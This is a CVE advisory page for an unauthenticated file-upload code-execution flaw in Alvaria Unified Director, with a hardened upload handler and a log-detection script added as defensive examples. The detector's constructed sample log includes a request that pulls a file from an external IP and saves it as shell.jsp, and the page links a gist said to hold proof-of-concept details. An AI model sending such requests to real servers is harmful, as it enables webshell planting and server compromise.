Cyber Posture

CVE-2024-56973

Critical

Published: 14 February 2025
Modified: 15 April 2026
KEV Added: not listed
Patch: upgrade to Unified IP Unified Director 7.2SP2 or later
CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS Score: 0.0057 (68.6th percentile)
Risk Priority: 20 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2024-56973 is a critical-severity Improper Preservation of Permissions (CWE-281) vulnerability in Alvaria Unified IP Unified Director before version 7.2SP2. Its CVSS v3.1 base score is 9.8 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). EPSS ranks it in the top 31.4% of CVEs by exploit likelihood (68.6th percentile), and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).

Threat & Defense at a Glance

What attackers do: exploitation maps to Exploit Public-Facing Application (T1190). What defenders deploy: see the NIST 800-53 controls recommended below.
Threat & Defense Details

Mitigating Controls (NIST 800-53 r5, AI-generated)

AC-3 Access Enforcement (prevent)

Enforces approved authorizations on the ProcessUploadFromURL.jsp component to prevent unauthorized remote access and arbitrary code execution via insecure permissions.

Patching (prevent)

Requires timely identification, reporting, and correction of the specific flaw in versions prior to 7.2SP2, directly mitigating the vulnerability through patching.

SI-10 Information Input Validation (prevent)

Validates the source and filename parameters in ProcessUploadFromURL.jsp to block malicious inputs that enable arbitrary code execution.
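The following is an added example, not Alvaria's code and not taken from the advisory: a hardened "upload from URL" handler showing what the two controls named above (AC-3 and SI-10) look like when applied to `source` and `filename` parameters. The authorization gate runs before any input is touched, both parameters are checked against allowlists, and the destination is confirmed to stay inside a fixed directory. The role name, allowed hosts, allowed extensions and upload directory are assumptions for the example.

```python
"""Added example, not Alvaria's code: a hardened "upload from URL" handler
that applies AC-3 (authorization gate) and SI-10 (allowlist validation of
`source` and `filename`). Policy constants below are assumptions."""
import ipaddress
import posixpath
import re
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urlsplit

# Assumed deployment policy: who may upload, where files may come from,
# what may be stored, and where it lands (outside any servlet webroot).
UPLOAD_ROLE = "upload-admin"
ALLOWED_SCHEMES = {"https"}
ALLOWED_SOURCE_HOSTS = {"files.corp.example"}
ALLOWED_EXTENSIONS = {".wav", ".csv", ".txt"}   # nothing a JSP container executes
UPLOAD_ROOT = "/var/lib/director/uploads"
# A plain basename: no separators, no leading dot, bounded length.
FILENAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}")


@dataclass
class Request:
    """Stand-in for the HTTP request the JSP handler receives."""
    source: str
    filename: str
    authenticated: bool = False
    roles: set = field(default_factory=set)


@dataclass
class Decision:
    allowed: bool
    reason: str
    dest_path: Optional[str] = None


def check_access(req: Request) -> Optional[str]:
    """AC-3: enforce approved authorizations before touching the inputs."""
    if not req.authenticated:
        return "unauthenticated"
    if UPLOAD_ROLE not in req.roles:
        return "missing role " + UPLOAD_ROLE
    return None


def validate_source(source: str) -> Optional[str]:
    """SI-10 for `source`: https only, no embedded credentials, no literal
    IP addresses (keeps loopback and internal ranges out), allowlisted host."""
    try:
        parts = urlsplit(source)
    except ValueError:
        return "unparseable URL"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return "scheme not allowed"
    if parts.username or parts.password:
        return "credentials in URL"
    host = parts.hostname or ""
    try:
        ipaddress.ip_address(host)
        return "literal IP not allowed"
    except ValueError:
        pass
    if host.lower() not in ALLOWED_SOURCE_HOSTS:
        return "host not allowlisted"
    return None


def validate_filename(filename: str) -> Optional[str]:
    """SI-10 for `filename`: a single path component with an allowed
    extension; traversal sequences and container-executable names fail here."""
    if not FILENAME_RE.fullmatch(filename):
        return "not a plain basename"
    if posixpath.splitext(filename)[1].lower() not in ALLOWED_EXTENSIONS:
        return "extension not allowed"
    return None


def handle_upload_from_url(req: Request) -> Decision:
    """Authorization first, then validation, then a final check that the
    destination still resolves inside UPLOAD_ROOT."""
    denied = check_access(req)
    if denied:
        return Decision(False, "access denied: " + denied)
    problem = validate_source(req.source)
    if problem:
        return Decision(False, "bad source: " + problem)
    problem = validate_filename(req.filename)
    if problem:
        return Decision(False, "bad filename: " + problem)
    dest = posixpath.normpath(posixpath.join(UPLOAD_ROOT, req.filename))
    if posixpath.dirname(dest) != UPLOAD_ROOT:
        return Decision(False, "destination escaped upload root")
    # The real handler would now fetch `source` with size and time limits
    # and write it to `dest`; the network fetch is omitted in this example.
    return Decision(True, "ok", dest)


if __name__ == "__main__":
    ok = Request("https://files.corp.example/prompt.wav", "prompt.wav",
                 authenticated=True, roles={UPLOAD_ROLE})
    print(handle_upload_from_url(ok))
    print(handle_upload_from_url(Request("https://files.corp.example/s.jsp", "s.jsp",
                                         authenticated=True, roles={UPLOAD_ROLE})))
```

The order matters: the authorization check runs first so that an unauthenticated caller never reaches the parser or the filesystem, and the extension allowlist is checked on the final extension only, which is what a servlet container uses to decide whether to execute a file. The upload directory sits outside the webroot so that even a file that slips through validation is served as data, not executed.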

MITRE ATT&CK Enterprise Techniques (AI-generated)

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Why these techniques?

Direct RCE via unauthenticated upload and execution through a public-facing JSP endpoint maps cleanly to exploitation of a public-facing application.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

NVD Description

Insecure Permissions vulnerability in Alvaria, Inc Unified IP Unified Director before v.7.2SP2 allows a remote attacker to execute arbitrary code via the source and filename parameters to the ProcessUploadFromURL.jsp component.

Deeper analysis (AI-generated)

CVE-2024-56973 is an Insecure Permissions vulnerability (CWE-281) affecting Alvaria, Inc's Unified IP Unified Director software in versions prior to 7.2SP2. The flaw resides in the ProcessUploadFromURL.jsp component, where inadequate permission controls on the source and filename parameters enable a remote attacker to execute arbitrary code. This issue carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), classifying it as critical due to its potential for severe impact across confidentiality, integrity, and availability.

A remote attacker requires no privileges, authentication, or user interaction to exploit this vulnerability over the network with low complexity. By crafting requests to the vulnerable ProcessUploadFromURL.jsp endpoint using the source and filename parameters, the attacker can upload and execute malicious code on the target system, potentially leading to full server compromise, data theft, or further lateral movement within the environment.
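Because the request pattern described above (a hit on ProcessUploadFromURL.jsp carrying `source` and `filename`) is visible in ordinary web-server access logs, it can be hunted for retrospectively. The following is an added example, not from the advisory or the vendor: a small detection run over constructed access-log lines. The internal address range, the list of container-executable extensions and the severity scheme are assumptions; the log lines are made up for the example and are not real traffic.

```python
"""Added example, not from the advisory or the vendor: scan combined-format
access logs for requests to ProcessUploadFromURL.jsp that carry the `source`
or `filename` parameters. INTERNAL_NET, EXECUTABLE_EXT and the severity
scheme are assumptions; SAMPLE_LOG is constructed, not real traffic."""
import ipaddress
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/ProcessUploadFromURL.jsp"
INTERNAL_NET = ipaddress.ip_network("10.0.0.0/8")                # assumed admin range
EXECUTABLE_EXT = (".jsp", ".jspx", ".jspf", ".war", ".class")     # assumed

# Constructed sample in combined log format (not real traffic).
SAMPLE_LOG = """\
10.1.2.3 - - [14/Feb/2025:10:01:02 +0000] "GET /Director/index.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Feb/2025:10:01:05 +0000] "GET /Director/ProcessUploadFromURL.jsp?source=http%3A%2F%2F198.51.100.9%2Fx.txt&filename=shell.jsp HTTP/1.1" 200 88 "-" "curl/8.0"
10.1.2.3 - - [14/Feb/2025:10:02:11 +0000] "POST /Director/ProcessUploadFromURL.jsp HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [14/Feb/2025:10:03:40 +0000] "GET /Director/ProcessUploadFromURL.jsp?filename=prompt.wav&source=https%3A%2F%2Ffiles.corp.example%2Fprompt.wav HTTP/1.1" 200 12 "-" "python-requests/2.31"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def _outside_internal(addr: str) -> bool:
    """True for a literal IP address outside INTERNAL_NET; False for
    hostnames and anything unparseable."""
    try:
        return ipaddress.ip_address(addr) not in INTERNAL_NET
    except ValueError:
        return False


def analyse_line(line: str) -> Optional[dict]:
    """Return None for lines that do not hit the endpoint, otherwise a hit
    record with a severity and the indicators that drove it."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    if not target.path.endswith(ENDPOINT):
        return None
    params = parse_qs(target.query)          # percent-decoded query values
    indicators = []
    dangerous = False
    if _outside_internal(m["client"]):
        indicators.append("client outside internal range")
    if m["method"] == "POST" and not params:
        indicators.append("POST body parameters are not visible in the access log")
    for name in ("source", "filename"):
        if name in params:
            indicators.append(name + " parameter present")
    for fn in params.get("filename", []):
        if "/" in fn or "\\" in fn or ".." in fn:
            indicators.append("filename contains path components")
            dangerous = True
        if fn.lower().endswith(EXECUTABLE_EXT):
            indicators.append("filename has container-executable extension")
            dangerous = True
    for src in params.get("source", []):
        if _outside_internal(urlsplit(src).hostname or ""):
            indicators.append("source points at a literal external IP")
            dangerous = True
    severity = "info"
    if m["method"] == "POST" or params.keys() & {"source", "filename"}:
        severity = "medium"
    if dangerous:
        severity = "high"
    return {"client": m["client"], "ts": m["ts"], "method": m["method"],
            "status": m["status"], "severity": severity, "indicators": indicators}


def scan(log_text: str) -> list:
    """Run the detection over a whole log and keep only the hits."""
    return [h for h in (analyse_line(ln) for ln in log_text.splitlines()) if h]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["severity"], hit["client"], hit["method"], "; ".join(hit["indicators"]))
```

Query strings of GET requests appear in access logs, but POST bodies do not, so the POST hit is surfaced at medium severity with a note rather than scored on its parameters; confirming it needs application or WAF logs. Any hit from outside the expected management range is worth a look regardless of score, since the endpoint requires no authentication in affected versions.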

Mitigation involves upgrading to Unified IP Unified Director version 7.2SP2 or later, as earlier versions are explicitly vulnerable. Until the upgrade is applied, restricting network access to the Director web interface, and to the ProcessUploadFromURL.jsp endpoint in particular, to trusted management addresses reduces exposure, since the flaw requires no authentication. Additional details, including potential proof-of-concept information, are available in the referenced gist at https://gist.github.com/VAMorales/1092a29ac7d0b4b80d5c853b9a22a65d.

Details

CWE(s)

CWE-281 Improper Preservation of Permissions

CVEs Like This One

CVE-2025-25871 (shared CWE-281)
CVE-2024-55507 (shared CWE-281)
CVE-2024-54818 (shared CWE-281)
CVE-2024-54879 (shared CWE-281)
CVE-2024-54880 (shared CWE-281)
CVE-2024-40672 (shared CWE-281)
CVE-2024-46622 (shared CWE-281)
CVE-2025-30456 (shared CWE-281)
CVE-2025-30449 (shared CWE-281)
CVE-2025-25711 (shared CWE-281)

References

https://gist.github.com/VAMorales/1092a29ac7d0b4b80d5c853b9a22a65d